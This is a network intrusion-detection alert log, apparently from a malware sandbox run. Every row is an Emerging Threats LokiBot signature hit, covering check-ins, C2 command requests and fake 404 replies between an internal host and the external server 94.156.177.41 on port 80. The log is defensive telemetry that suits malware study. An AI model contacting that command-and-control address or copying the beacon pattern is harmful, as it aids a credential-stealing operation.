                                                2024-11-20T10:11:48.768499+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249184TCP
                                                2024-11-20T10:11:48.916450+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.4180TCP
                                                2024-11-20T10:11:48.916450+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.4180TCP
                                                2024-11-20T10:11:48.916450+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.4180TCP
                                                2024-11-20T10:11:49.780927+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.4180TCP
                                                2024-11-20T10:11:49.780927+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.4180TCP
                                                2024-11-20T10:11:49.786314+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249185TCP
                                                2024-11-20T10:11:49.934221+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.4180TCP
                                                2024-11-20T10:11:49.934221+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.4180TCP
                                                2024-11-20T10:11:49.934221+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.4180TCP
                                                2024-11-20T10:11:50.661713+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.4180TCP
                                                2024-11-20T10:11:50.661713+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.4180TCP
                                                2024-11-20T10:11:50.669657+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249186TCP
                                                2024-11-20T10:11:50.825355+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.4180TCP
                                                2024-11-20T10:11:50.825355+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.4180TCP
                                                2024-11-20T10:11:50.825355+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.4180TCP
                                                2024-11-20T10:11:51.563928+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.4180TCP
                                                2024-11-20T10:11:51.563928+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.4180TCP
                                                2024-11-20T10:11:51.578703+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249187TCP
                                                2024-11-20T10:11:51.974265+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.4180TCP
                                                2024-11-20T10:11:51.974265+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.4180TCP
                                                2024-11-20T10:11:51.974265+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.4180TCP
                                                2024-11-20T10:11:52.677319+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.4180TCP
                                                2024-11-20T10:11:52.677319+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.4180TCP
                                                2024-11-20T10:11:52.682271+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249188TCP
                                                2024-11-20T10:11:52.833476+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.4180TCP
                                                2024-11-20T10:11:52.833476+01002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.4180TCP
                                                2024-11-20T10:11:52.833476+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.4180TCP
                                                2024-11-20T10:11:53.596271+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.4180TCP
                                                2024-11-20T10:11:53.596271+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.4180TCP
                                                2024-11-20T10:11:53.605545+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249189TCP
                                                2024-11-20T10:11:53.743942+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.4180TCP
                                                2024-11-20T10:11:53.743942+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.4180TCP
                                                2024-11-20T10:11:53.743942+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.4180TCP
                                                2024-11-20T10:11:54.506581+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.4180TCP
                                                2024-11-20T10:11:54.506581+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.4180TCP
                                                2024-11-20T10:11:54.512561+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249190TCP
                                                2024-11-20T10:11:54.665755+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.4180TCP
                                                2024-11-20T10:11:54.665755+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.4180TCP
                                                2024-11-20T10:11:54.665755+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.4180TCP
                                                2024-11-20T10:11:55.397349+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.4180TCP
                                                2024-11-20T10:11:55.397349+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.4180TCP
                                                2024-11-20T10:11:55.402298+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249191TCP
                                                2024-11-20T10:11:55.543705+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.4180TCP
                                                2024-11-20T10:11:55.543705+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.4180TCP
                                                2024-11-20T10:11:55.543705+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.4180TCP
                                                2024-11-20T10:11:56.305736+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.4180TCP
                                                2024-11-20T10:11:56.305736+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.4180TCP
                                                2024-11-20T10:11:56.311347+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249192TCP
                                                2024-11-20T10:11:56.465409+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.4180TCP
                                                2024-11-20T10:11:56.465409+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.4180TCP
                                                2024-11-20T10:11:56.465409+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.4180TCP
                                                2024-11-20T10:11:57.196530+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.4180TCP
                                                2024-11-20T10:11:57.196530+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.4180TCP
                                                2024-11-20T10:11:57.204029+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249193TCP
                                                2024-11-20T10:11:57.354850+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.4180TCP
                                                2024-11-20T10:11:57.354850+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.4180TCP
                                                2024-11-20T10:11:57.354850+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.4180TCP
                                                2024-11-20T10:11:58.102470+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.4180TCP
                                                2024-11-20T10:11:58.102470+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.4180TCP
                                                2024-11-20T10:11:58.107727+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249194TCP
                                                2024-11-20T10:11:58.251851+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.4180TCP
                                                2024-11-20T10:11:58.251851+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.4180TCP
                                                2024-11-20T10:11:58.251851+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.4180TCP
                                                2024-11-20T10:11:58.990871+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.4180TCP
                                                2024-11-20T10:11:58.990871+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.4180TCP
                                                2024-11-20T10:11:58.995828+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249195TCP
                                                2024-11-20T10:11:59.153133+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.4180TCP
                                                2024-11-20T10:11:59.153133+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.4180TCP
                                                2024-11-20T10:11:59.153133+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.4180TCP
                                                2024-11-20T10:11:59.906870+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.4180TCP
                                                2024-11-20T10:11:59.906870+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.4180TCP
                                                2024-11-20T10:11:59.914415+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249196TCP
                                                2024-11-20T10:12:00.062553+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.4180TCP
                                                2024-11-20T10:12:00.062553+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.4180TCP
                                                2024-11-20T10:12:00.062553+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.4180TCP
                                                2024-11-20T10:12:00.919609+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.4180TCP
                                                2024-11-20T10:12:00.919609+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.4180TCP
                                                2024-11-20T10:12:00.924468+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249197TCP
                                                2024-11-20T10:12:01.086240+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.4180TCP
                                                2024-11-20T10:12:01.086240+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.4180TCP
                                                2024-11-20T10:12:01.086240+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.4180TCP
                                                2024-11-20T10:12:01.961464+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.4180TCP
                                                2024-11-20T10:12:01.961464+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.4180TCP
                                                2024-11-20T10:12:01.969084+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249198TCP
                                                2024-11-20T10:12:02.135572+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.4180TCP
                                                2024-11-20T10:12:02.135572+01002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.4180TCP
                                                2024-11-20T10:12:02.135572+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.4180TCP
                                                2024-11-20T10:12:03.002110+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.4180TCP
                                                2024-11-20T10:12:03.002110+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.4180TCP
                                                2024-11-20T10:12:03.007930+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249199TCP
                                                2024-11-20T10:12:03.154171+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.4180TCP
                                                2024-11-20T10:12:03.154171+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.4180TCP
                                                2024-11-20T10:12:03.154171+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.4180TCP
                                                2024-11-20T10:12:04.030990+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.4180TCP
                                                2024-11-20T10:12:04.030990+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.4180TCP
                                                2024-11-20T10:12:04.035992+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249200TCP
                                                2024-11-20T10:12:04.183469+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.4180TCP
                                                2024-11-20T10:12:04.183469+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.4180TCP
                                                2024-11-20T10:12:04.183469+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.4180TCP
                                                2024-11-20T10:12:05.064968+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.4180TCP
                                                2024-11-20T10:12:05.064968+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.4180TCP
                                                2024-11-20T10:12:05.070422+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249201TCP
                                                2024-11-20T10:12:05.221730+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.4180TCP
                                                2024-11-20T10:12:05.221730+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.4180TCP
                                                2024-11-20T10:12:05.221730+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.4180TCP
                                                2024-11-20T10:12:05.957357+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.4180TCP
                                                2024-11-20T10:12:05.957357+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.4180TCP
                                                2024-11-20T10:12:05.963806+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249202TCP
                                                2024-11-20T10:12:06.101870+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.4180TCP
                                                2024-11-20T10:12:06.101870+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.4180TCP
                                                2024-11-20T10:12:06.101870+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.4180TCP
                                                2024-11-20T10:12:06.846240+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.4180TCP
                                                2024-11-20T10:12:06.846240+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.4180TCP
                                                2024-11-20T10:12:06.854208+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249203TCP
                                                2024-11-20T10:12:06.992362+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.4180TCP
                                                2024-11-20T10:12:06.992362+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.4180TCP
                                                2024-11-20T10:12:06.992362+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.4180TCP
                                                2024-11-20T10:12:07.734502+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.4180TCP
                                                2024-11-20T10:12:07.734502+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.4180TCP
                                                2024-11-20T10:12:07.741514+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249204TCP
                                                2024-11-20T10:12:07.878233+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.4180TCP
                                                2024-11-20T10:12:07.878233+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.4180TCP
                                                2024-11-20T10:12:07.878233+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.4180TCP
                                                2024-11-20T10:12:08.610456+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.4180TCP
                                                2024-11-20T10:12:08.610456+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.4180TCP
                                                2024-11-20T10:12:08.615371+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249205TCP
                                                2024-11-20T10:12:08.762365+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920694.156.177.4180TCP
                                                2024-11-20T10:12:08.762365+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920694.156.177.4180TCP
                                                2024-11-20T10:12:08.762365+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920694.156.177.4180TCP
                                                2024-11-20T10:12:09.486250+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920694.156.177.4180TCP
                                                2024-11-20T10:12:09.486250+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920694.156.177.4180TCP
                                                2024-11-20T10:12:09.492422+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249206TCP
                                                2024-11-20T10:12:09.636983+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920794.156.177.4180TCP
                                                2024-11-20T10:12:09.636983+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920794.156.177.4180TCP
                                                2024-11-20T10:12:09.636983+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920794.156.177.4180TCP
                                                2024-11-20T10:12:10.489003+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920794.156.177.4180TCP
                                                2024-11-20T10:12:10.489003+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920794.156.177.4180TCP
                                                2024-11-20T10:12:10.494091+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249207TCP
                                                2024-11-20T10:12:10.655009+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920894.156.177.4180TCP
                                                2024-11-20T10:12:10.655009+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920894.156.177.4180TCP
                                                2024-11-20T10:12:10.655009+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920894.156.177.4180TCP
                                                2024-11-20T10:12:11.403681+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920894.156.177.4180TCP
                                                2024-11-20T10:12:11.403681+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920894.156.177.4180TCP
                                                2024-11-20T10:12:11.411925+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249208TCP
                                                2024-11-20T10:12:11.548573+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920994.156.177.4180TCP
                                                2024-11-20T10:12:11.548573+01002025381ET MALWARE LokiBot Checkin1192.168.2.224920994.156.177.4180TCP
                                                2024-11-20T10:12:11.548573+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920994.156.177.4180TCP
                                                2024-11-20T10:12:12.422371+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920994.156.177.4180TCP
                                                2024-11-20T10:12:12.422371+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920994.156.177.4180TCP
                                                2024-11-20T10:12:12.427402+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249209TCP
                                                2024-11-20T10:12:12.583479+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921094.156.177.4180TCP
                                                2024-11-20T10:12:12.583479+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921094.156.177.4180TCP
                                                2024-11-20T10:12:12.583479+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921094.156.177.4180TCP
                                                2024-11-20T10:12:13.483743+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921094.156.177.4180TCP
                                                2024-11-20T10:12:13.483743+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921094.156.177.4180TCP
                                                2024-11-20T10:12:13.489277+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249210TCP
                                                2024-11-20T10:12:13.635352+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921194.156.177.4180TCP
                                                2024-11-20T10:12:13.635352+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921194.156.177.4180TCP
                                                2024-11-20T10:12:13.635352+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921194.156.177.4180TCP
                                                2024-11-20T10:12:14.380737+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921194.156.177.4180TCP
                                                2024-11-20T10:12:14.380737+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921194.156.177.4180TCP
                                                2024-11-20T10:12:14.386020+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249211TCP
                                                2024-11-20T10:12:14.668490+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921294.156.177.4180TCP
                                                2024-11-20T10:12:14.668490+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921294.156.177.4180TCP
                                                2024-11-20T10:12:14.668490+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921294.156.177.4180TCP
                                                2024-11-20T10:12:15.543328+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921294.156.177.4180TCP
                                                2024-11-20T10:12:15.543328+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921294.156.177.4180TCP
                                                2024-11-20T10:12:15.548693+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249212TCP
                                                2024-11-20T10:12:15.692786+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921394.156.177.4180TCP
                                                2024-11-20T10:12:15.692786+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921394.156.177.4180TCP
                                                2024-11-20T10:12:15.692786+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921394.156.177.4180TCP
                                                2024-11-20T10:12:16.542989+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921394.156.177.4180TCP
                                                2024-11-20T10:12:16.542989+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921394.156.177.4180TCP
                                                2024-11-20T10:12:16.548175+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249213TCP
                                                2024-11-20T10:12:16.709953+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921494.156.177.4180TCP
                                                2024-11-20T10:12:16.709953+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921494.156.177.4180TCP
                                                2024-11-20T10:12:16.709953+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921494.156.177.4180TCP
                                                2024-11-20T10:12:17.576303+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921494.156.177.4180TCP
                                                2024-11-20T10:12:17.576303+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921494.156.177.4180TCP
                                                2024-11-20T10:12:17.581516+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249214TCP
                                                2024-11-20T10:12:17.740346+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921594.156.177.4180TCP
                                                2024-11-20T10:12:17.740346+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921594.156.177.4180TCP
                                                2024-11-20T10:12:17.740346+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921594.156.177.4180TCP
                                                2024-11-20T10:12:18.599605+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921594.156.177.4180TCP
                                                2024-11-20T10:12:18.599605+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921594.156.177.4180TCP
                                                2024-11-20T10:12:18.607117+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249215TCP
                                                2024-11-20T10:12:19.475029+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921694.156.177.4180TCP
                                                2024-11-20T10:12:19.475029+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921694.156.177.4180TCP
                                                2024-11-20T10:12:19.475029+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921694.156.177.4180TCP
                                                2024-11-20T10:12:20.249895+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921694.156.177.4180TCP
                                                2024-11-20T10:12:20.249895+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921694.156.177.4180TCP
                                                2024-11-20T10:12:20.254986+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249216TCP
                                                2024-11-20T10:12:20.388739+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921794.156.177.4180TCP
                                                2024-11-20T10:12:20.388739+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921794.156.177.4180TCP
                                                2024-11-20T10:12:20.388739+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921794.156.177.4180TCP
                                                2024-11-20T10:12:21.119620+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921794.156.177.4180TCP
                                                2024-11-20T10:12:21.119620+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921794.156.177.4180TCP
                                                2024-11-20T10:12:21.124909+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249217TCP
                                                2024-11-20T10:12:21.265845+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921894.156.177.4180TCP
                                                2024-11-20T10:12:21.265845+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921894.156.177.4180TCP
                                                2024-11-20T10:12:21.265845+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921894.156.177.4180TCP
                                                2024-11-20T10:12:22.167325+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921894.156.177.4180TCP
                                                2024-11-20T10:12:22.167325+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921894.156.177.4180TCP
                                                2024-11-20T10:12:22.175233+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249218TCP
                                                2024-11-20T10:12:22.394589+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224921994.156.177.4180TCP
                                                2024-11-20T10:12:22.394589+01002025381ET MALWARE LokiBot Checkin1192.168.2.224921994.156.177.4180TCP
                                                2024-11-20T10:12:22.394589+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224921994.156.177.4180TCP
                                                2024-11-20T10:12:23.270065+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224921994.156.177.4180TCP
                                                2024-11-20T10:12:23.270065+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224921994.156.177.4180TCP
                                                2024-11-20T10:12:23.277419+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249219TCP
                                                2024-11-20T10:12:23.419939+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922094.156.177.4180TCP
                                                2024-11-20T10:12:23.419939+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922094.156.177.4180TCP
                                                2024-11-20T10:12:23.419939+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922094.156.177.4180TCP
                                                2024-11-20T10:12:24.148409+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922094.156.177.4180TCP
                                                2024-11-20T10:12:24.148409+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922094.156.177.4180TCP
                                                2024-11-20T10:12:24.155302+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249220TCP
                                                2024-11-20T10:12:24.307414+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922194.156.177.4180TCP
                                                2024-11-20T10:12:24.307414+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922194.156.177.4180TCP
                                                2024-11-20T10:12:24.307414+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922194.156.177.4180TCP
                                                2024-11-20T10:12:25.196987+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224922194.156.177.4180TCP
                                                2024-11-20T10:12:25.196987+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224922194.156.177.4180TCP
                                                2024-11-20T10:12:25.204348+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.4180192.168.2.2249221TCP
                                                2024-11-20T10:12:25.356968+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224922294.156.177.4180TCP
                                                2024-11-20T10:12:25.356968+01002025381ET MALWARE LokiBot Checkin1192.168.2.224922294.156.177.4180TCP
                                                2024-11-20T10:12:25.356968+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224922294.156.177.4180TCP
